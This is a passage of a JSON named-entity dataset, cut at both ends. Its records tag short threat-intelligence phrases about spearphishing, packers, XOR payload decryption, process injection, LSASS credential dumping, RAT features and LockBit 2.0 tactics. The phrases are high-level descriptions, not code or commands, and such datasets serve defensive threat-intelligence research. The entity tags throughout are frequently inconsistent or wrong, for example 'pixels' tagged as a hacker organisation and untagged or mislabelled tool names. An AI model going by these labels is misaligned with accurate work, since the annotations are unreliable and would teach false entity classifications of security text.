"O", "O" ] }, { "tokens": [ "Spearphishing", "emails", "with", "malicious", "attachments" ], "ner_tags": [ "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "attached", "to", "spearphishing", "emails" ], "ner_tags": [ "O", "O", "B-Way", "O" ] }, { "tokens": [ "exploitation", "of", "public-facing", "applications" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "User", "execution", "[T1204]", "of", "malicious", "files" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "steganography", "[T1027.003]", "to", "hide", "stolen", "data", "inside", "other", "files", "stored", "on", "GitHub" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "multi-hop", "proxies" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "stage", "collected", "data", "locally" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "Exfiltration", "over", "C2", "channel" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "encryption" ], "ner_tags": [ "O" ] }, { "tokens": [ "24", "different", "IP", "addresses", "in", "use" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "compromised", "devices", "that", "act", "as", "proxies", "for", "their", "C&C", "servers" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "use", "some", "victims", "as", "proxies,", "or", "some", "vulnerable", "devices", "to", "forward", "communication", "to", "their", "real", "C&C", "servers." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "phishing", "emails", "have", "similar", "topics", "and", "pretend", "to", "come", "from", "some", "of", "the", "same", "entities" ], "ner_tags": [ "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "attachments", "used", "for", "phishing", "emails," ], "ner_tags": [ "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "emails", "have", "a", "PDF", "document", "attached" ], "ner_tags": [ "B-Way", "O", "O", "B-Tool", "B-SamFile", "O" ] }, { "tokens": [ "PDF", "file", "attached" ], "ner_tags": [ "I-Tool", "I-Tool", "O" ] }, { "tokens": [ "used", "emails", "with", "PDF", "or", "RTF", "files", "attached", "that", "contain", "a", "link", "to", "download", "malware" ], "ner_tags": [ "O", "B-Way", "O", "B-Tool", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "user", "must", "click", "to", "download", "the", "malware" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "manually", "extract", "the", "file", "and", "execute", "it" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "have", "attempted", "to", "get", "users", "to", "execute", "malicious", "files", "masquerading", "as", "documents" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O" ] }, { "tokens": [ "regular", "RAR", "archives", "that", "have", "an", "executable", "file", "inside." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "contains", "several", "benign", "files", "that", "are", "written", "to", "disk", "(they", "are", "not", "part", "of", "NSIS", "binaries", "and", "they", "are", "not", "used", "at", "all", "by", "the", "installer)", "and", "two", "files", "that", "are", "malicious" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "reads", "a", "string", "(or", "binary", "data)", "from", "its", "resource", "section" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "reads", "data", "from", "its", "own", "resource", "section", "and", "decrypts", "a", "payload." ], "ner_tags": [ "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "is", "read", "from", "an", "encrypted", "resource" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "two", "shellcodes", "contained", "in", "the", "compiled", "AutoIt", "script" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Read", "a", "binary", "from", "its", "resource", "section,", "write", "it", "to", "disk", "and", "execute", "it" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "variety", "of", "packers", "used", "for", "these", "executables" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "different", "variants", "of", "a", "packer" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "is", "packed", "with", "CyaX" ], "ner_tags": [ "O", "O", "O", "B-Way" ] }, { "tokens": [ "is", "gzip-decompressed", "and", "executed" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ ".NET", "packer", "known", "as", "CyaX" ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "B-Idus" ] }, { "tokens": [ "used", "an", "AutoIt", "packer", "that", "comes", "heavily", "obfuscated." ], "ner_tags": [ "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "have", "used", "various", "layers", "of", "packers", "for", "obfuscating", "their", "droppers." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "decrypting", "the", "payload" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "decrypting" ], "ner_tags": [ "O" ] }, { "tokens": [ "decrypt" ], "ner_tags": [ "O" ] }, { "tokens": [ "decrypts", "it" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "decrypts", "another", "executable" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "a", "string", "that", "will", "be", "decrypted" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "decrypts", "the", "array", "by", "doing", "a", "single-byte", "XOR", "operation,", "cycling", "through", "the", "key" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "decryption", "of", "the", "payload", "is", "based", "on", "XOR", "operations" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "decrypt", "the", "payload" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "a", "single-byte", "XOR", "algorithm." ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "decrypt", "the", "payload" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "have", "used", "various", "encryption", "algorithms", "in", "their", "droppers", "to", "hide", "strings", "and", "payloads" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "injecting", "it", "into", "legitimate", "processes." ], "ner_tags": [ "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "be", "injected", "into", "a", "new", "process", "or", "loaded", "in", "the", "same", "process", "space" ], "ner_tags": [ "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "injected", "into", "a", "different", "process," ], "ner_tags": [ "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "injection", "of", "the", "payload" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "performs", "the", "injection", "and", "execution", "of", "the", "payload" ], "ner_tags": [ "O", "O", "B-Features", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "inject", "it", "into", "some", "process" ], "ner_tags": [ "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "shellcode", "with", "RunPE", "code", "is", "used", "to", "perform", "the", "injection" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RAR", "archive", "is", "downloaded" ], "ner_tags": [ "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "compressed", "archives" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "layers", "of", "encryption,", "obfuscation", "or", "anti-analysis" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "was", "hiding", "in", "non-malicious", "code," ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "encrypted", "resource", "and", "XORed", "with", "a", "hardcoded", "password" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "encrypted", "with", "this", "same", "XOR-based", "algorithm" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DLL", "is", "run", "with", "rundll32" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "uses", "steganography" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "reads", "pixels", "from", "an", "image", "contained", "in", "the", "first", "binary" ], "ner_tags": [ "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "stores", "every", "pixel", "as", "three", "numbers", "according", "to", "its", "red,", "green", "and", "blue", "components" ], "ner_tags": [ "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "have", "used", "packers", "that", "read", "pixel", "data", "from", "images", "contained", "in", "PE", "files’", "resource", "sections", "and", "build", "the", "next", "layer", "of", "execution", "from", "the", "data" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DLL", "that", "will", "be", "loaded", "and", "called", "in", "the", "same", "address", "space" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "performs", "the", "injection", "is", "contained", "in", "an", "array", "and", "is", "dynamically", "loaded." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "disabling", "Windows", "Defender" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "have", "used", "CyaX", "packer,", "which", "can", "disable", "Windows", "Defender." ], "ner_tags": [ "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "checking", "for", "security", "products" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "used", "droppers", "that", "check", "for", "security", "software", "present", "in", "a", "victim’s", "computer" ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "loaded", "with", "VirtualAlloc", "and", "executed" ], "ner_tags": [ "O", "O", "B-Tool", "O", "O" ] }, { "tokens": [ "used", "API", "calls", "in", "their", "droppers,", "such", "as", "CreateProcessA,", "WriteProcessMemory", "and", "ResumeThread,", "to", "load", "and", "execute", "shellcode", "in", "memory" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "created", "in", "the", "Startup", "folder", "to", "execute", "the", "script." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "used", "RATs", "that", "persist", "by", "creating", "a", "Run", "registry", "key", "or", "by", "creating", "a", "copy", "of", "the", "malware", "in", "the", "Startup", "folder" ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "I-Features", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "I-Features", "I-Features", "I-Features", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "Delete", "the", "dropper", "executable" ], "ner_tags": [ "B-SamFile", "O", "B-SamFile", "O" ] }, { "tokens": [ "have", "used", "malware", "that", "deletes", "itself", "from", "the", "system" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Download", "and", "execute", "files" ], "ner_tags": [ "B-Features", "O", "I-Features", "I-Features" ] }, { "tokens": [ "ability", "to", "download", "and", "execute", "other", "malware" ], "ner_tags": [ "O", "O", "B-Features", "O", "B-Features", "O", "O" ] }, { "tokens": [ "uploading", "and", "downloading", "files" ], "ner_tags": [ "B-Features", "O", "B-Features", "I-Features" ] }, { "tokens": [ "keylogging" ], "ner_tags": [ "O" ] }, { "tokens": [ "keylogging" ], "ner_tags": [ "O" ] }, { "tokens": [ "keylogging," ], "ner_tags": [ "B-SamFile" ] }, { "tokens": [ "used", "various", "RATs", "that", "have", "keylogging", "capabilities" ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "screen", "capture" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "taking", "screenshots" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "used", "various", "RATs", "that", "can", "capture", "screenshots", "of", "victim", "machines" ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "I-Features", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "exfiltration", "of", "files" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "used", "various", "RATs", "that", "exfiltrate", "data", "over", "the", "same", "channel", "used", "for", "C&C" ], "ner_tags": [ "O", "O", "B-Way", "O", "B-SamFile", "B-Purp", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "used", "RATs", "that", "can", "launch", "a", "command", "shell", "for", "executing", "commands." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features" ] }, { "tokens": [ "have", "used", "scheduled", "tasks", "in", "their", "droppers", "and", "payloads", "to", "achieve", "persistence" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "used", "RATs", "that", "implement", "UAC", "bypassing." ], "ner_tags": [ "O", "B-Way", "O", "O", "B-Way", "O" ] }, { "tokens": [ "have", "used", "RATs", "that", "allow", "full", "access", "to", "the", "Registry," ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "have", "used", "droppers", "that", "inject", "the", "payload", "into", "legitimate", "processes" ], "ner_tags": [ "O", "O", "B-Way", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "used", "various", "RATs", "that", "can", "browse", "file", "systems" ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "B-Features", "I-Features", "O" ] }, { "tokens": [ "used", "various", "RATs", "with", "modules", "that", "show", "running", "processes" ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "used", "various", "RATs", "that", "can", "read", "the", "Registry." ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "I-Features", "I-Features", "B-HackOrg" ] }, { "tokens": [ "used", "various", "RATs", "that", "gather", "system", "information", "such", "as", "computer", "name", "and", "operating", "system", "during", "the", "initial", "infection" ], "ner_tags": [ "O", "O", "B-Way", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "used", "various", "RATs", "that", "can", "collect", "the", "IP", "address", "of", "the", "victim", "machine" ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "used", "various", "RATs", "that", "retrieve", "the", "current", "username", "during", "initial", "infection" ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "used", "various", "RATs", "that", "can", "perform", "remote", "desktop", "access." ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "used", "various", "RATs", "that", "can", "access", "the", "local", "file", "system", "and", "upload,", "download", "or", "delete", "files" ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "B-Features", "O", "O", "I-Features", "I-Features", "O", "B-Features", "B-Features", "O", "B-Features", "I-Features" ] }, { "tokens": [ "used", "Remcos", "RAT,", "which", "uses", "RC4", "for", "encrypting", "C&C", "communications" ], "ner_tags": [ "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "used", "various", "RATs", "that", "use", "TCP", "for", "C&C", "communications" ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "data", "exfiltration", "of", "sensitive", "information" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "move", "through", "the", "victim", "environment", "via", "RDP" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "mass", "deletion", "of", "virtual", "machines,", "storage,", "and", "configurations" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "to", "identify", "any", "credentials", "which", "may", "be", "stored", "in", "technical", "documentation" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "extraction", "of", "sensitive", "API", "Keys" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "Access", "to", "local", "password", "managers", "and", "databases", "to", "obtain", "further", "credentials" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Using", "compromised", "credentials", "to", "access", "corporate", "VPNs." ], "ner_tags": [ "I-Way", "I-Way", "I-Way", "O", "O", "O", "O" ] }, { "tokens": [ "victim", "controlled", "hostnames", "were", "revealed" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "runs", "a", "scheduled", "task" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "decryption", "of", "credentials" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "decrypted", "using", "DPAPI" ], "ner_tags": [ "O", "O", "B-Way" ] }, { "tokens": [ "These", "credentials", "are", "generated", "and", "stored", "in", "the", "memory", "of", "the", "LSASS", "process" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Attackers", "may", "attempt", "to", "access", "LSASS", "process", "memory", "to", "extract", "credentials", "as", "it", "stores", "a", "variety", "of", "credentials." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LSASS", "process", "memory", "is", "one", "of", "the", "prime", "targets", "for", "attackers,", "as", "well", "as", "malware", "armed", "with", "lateral", "movement", "capabilities", "since", "it", "caches", "a", "variety", "of", "credentials" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Credential", "extraction", "from", "the", "LSASS", "process" ], "ner_tags": [ "B-SamFile", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "credential-based", "deception", "is", "to", "stage", "the", "deceptive", "credentials", "in", "LSASS", "process", "memory." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Purp", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "credentials", "are", "extracted", "with", "Mimikatz." ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "credential", "extraction", "tool", "Mimikatz" ], "ner_tags": [ "B-Way", "B-Tool", "O", "B-SamFile" ] }, { "tokens": [ "uses", "the", "CreateProcessWithLogonW", "Windows", "API" ], "ner_tags": [ "O", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "calling", "the", "API" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "recon", "for", "interesting", "hostnames" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "public", "facing", "systems", "is", "compromised" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "be", "injected", "with", "deceptive", "credentials", "at", "multiple", "places", "like", "LSASS", "process", "memory" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Injecting", "NETONLY", "credentials", "into", "LSASS", "process", "memory" ], "ner_tags": [ "B-Way", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Injecting", "credentials", "into", "LSASS", "memory" ], "ner_tags": [ "B-Way", "I-Way", "O", "O", "O" ] }, { "tokens": [ "credentials", "being", "picked", "up", "and", "used", "to", "pivot", "to", "decoy", "systems", "in", "the", "network" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "keyloggers" ], "ner_tags": [ "B-SamFile" ] }, { "tokens": [ "flood", "a", "remote", "DNS", "server", "with", "false", "traffic." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "send", "traffic", "simultaneously", "to", "one", "server," ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "using", "the", "default", "factory", "credentials." ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "exfiltrating", "data", "from", "the", "target", "device" ], "ner_tags": [ "B-SamFile", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "covert", "channel", "that", "can", "be", "used", "to", "exfiltrate", "data", "from", "the", "victim", "device" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "deliver", "more", "malware," ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "extract", "data", "and", "files", "from", "endpoint", "devices." ], "ner_tags": [ "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "a", "version", "of", "the", "malware", "that", "was", "injected", "into", "a", "victim’s", "system" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "It", "usually", "pretends", "to", "be", "a", "legitimate", "file,", "such", "as", "an", "Adobe", "PDF", "or", "Dropbox", "file," ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "B-SamFile", "O", "B-Way", "B-SamFile" ] }, { "tokens": [ "The", "phishing", "email", "with", "the", "malicious", "attachment" ], "ner_tags": [ "O", "B-Way", "I-Way", "O", "O", "O", "O" ] }, { "tokens": [ "file", "is", "a", "Python", "program", "packaged", "by", "PyInstaller." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "is", "an", "obfuscating", "tool", "for", "Python", "script", "that", "makes", "the", "malware", "harder", "to", "be", "analyzed", "and", "detected." ], "ner_tags": [ "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "It", "contains", "Base64-encoded", "data" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "Python", "programs", "that", "are", "obfuscated", "using", "PyArmor" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "After", "decrypting", "the", "pyc", "file," ], "ner_tags": [ "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "it", "uses", "the", "following", "command", "to", "delete", "the", "data", "in", "PSReadline" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "It", "also", "checks", "the", "victim’s", "hostname" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "collects", "browser", "history", "and", "passwords", "from", "the", "following", "browsers" ], "ner_tags": [ "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "It", "also", "uses", "the", "command", "“CopyFromScreen”", "to", "capture", "a", "screenshot." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "I-Features", "B-HackOrg" ] }, { "tokens": [ "Downloading", "files", "and", "getting", "a", "screenshot" ], "ner_tags": [ "B-Features", "I-Features", "O", "I-Features", "I-Features", "B-HackOrg" ] }, { "tokens": [ "Download", "components", "for", "the", "Keylogger" ], "ner_tags": [ "B-Way", "B-Features", "O", "O", "B-Way" ] }, { "tokens": [ "It", "is", "a", "key", "logger", "that", "saves", "data", "in", "the", "“KeyLogs”", "folder." ], "ner_tags": [ "O", "O", "O", "B-Tool", "O", "O", "O", "B-Features", "O", "O", "B-Way", "O" ] }, { "tokens": [ "downloads", "three", "components", "from" ], "ner_tags": [ "B-Features", "O", "O", "O" ] }, { "tokens": [ "can", "be", "executed", "via", "scheduled", "tasks." ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "It", "was", "quite", "common", "to", "see", "scheduled", "tasks", "used", "to", "create", "persistence", "for", "the", "ransomware", "executable," ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "The", "threat", "actors", "also", "expressed", "interest", "in", "other", "access", "methods", "such", "as", "RDP" ], "ner_tags": [ "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Credentials", "that", "have", "either", "been", "reused", "across", "multiple", "platforms", "or", "have", "previously", "been", "exposed" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "this", "includes", "VPN", "accounts" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "Compromised", "accounts", "may", "be", "used", "to", "maintain", "access", "to", "the", "network." ], "ner_tags": [ "B-SamFile", "B-Tool", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "I-Features", "B-Purp" ] }, { "tokens": [ "local", "accounts." ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "domain", "and", "local", "accounts" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "Affiliates", "have", "been", "seen", "brute", "forcing" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Affiliates", "have", "been", "seen", "brute", "forcing", "exposed", "RDP", "services", "and", "compromising", "accounts", "with", "weak", "passwords." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Exploit", "Public-Facing", "Applications" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "is", "typically", "executed", "via", "command", "line", "arguments" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "some", "defense", "evasion", "batch", "scripts." ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "a", "batch", "script", "or", "a", "specially", "crafted", "command", "line", "script." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "ProxyShell", "elevation", "of", "privilege", "on", "the", "Exchange", "PowerShell", "Backend", "(CVE-2021-34523),", "Windows", "Background", "Intelligent", "Transfer", "Service", "(BITS)", "improperly", "handling", "symbolic", "links", "(CVE-2020-0787),", "and", "abusing", "the", "CMSTPLUA", "COM", "interface", "have", "all", "been", "seen", "as", "methods", "of", "privilege", "escalation." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "has", "utilized", "a", "UAC", "bypass", "tool." ], "ner_tags": [ "O", "O", "O", "B-Way", "I-Tool", "O" ] }, { "tokens": [ "Indicators,", "such", "as", "logs", "in", "Windows", "Event", "Logs", "or", "malicious", "files,", "are", "typically", "removed", "using", "wevtutil,", "a", "batch", "script,", "or", "CCleaner." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "I-Tool", "O", "O", "B-Way" ] }, { "tokens": [ "Windows", "Defender,", "other", "anti-malware", "solutions", "and", "monitoring", "tools", "are", "disabled", "utilizing", "a", "process", "explorer", "tool," ], "ner_tags": [ "I-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O" ] }, { "tokens": [ "Firewall", "rules", "have", "occasionally", "been", "seen", "being", "disabled", "as", "well." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "defense", "evasion", "phase,", "anti-malware", "and", "monitoring", "software", "is", "often", "disabled." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mimikatz", "is", "a", "key", "player", "in", "dumping", "credentials", "but", "LockBit", "2.0", "has", "been", "occasionally", "seen", "utilizing", "MiniDump", "as", "well." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "has", "been", "seen", "using", "the", "PowerShell", "module", "InvokeGPUpdate", "to", "update", "the", "group", "policy." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Most", "PowerShell", "scripts", "involved", "in", "LockBit", "2.0", "cases", "are", "Base64", "encoded." ], "ner_tags": [ "O", "B-Way", "B-Tool", "O", "O", "B-SamFile", 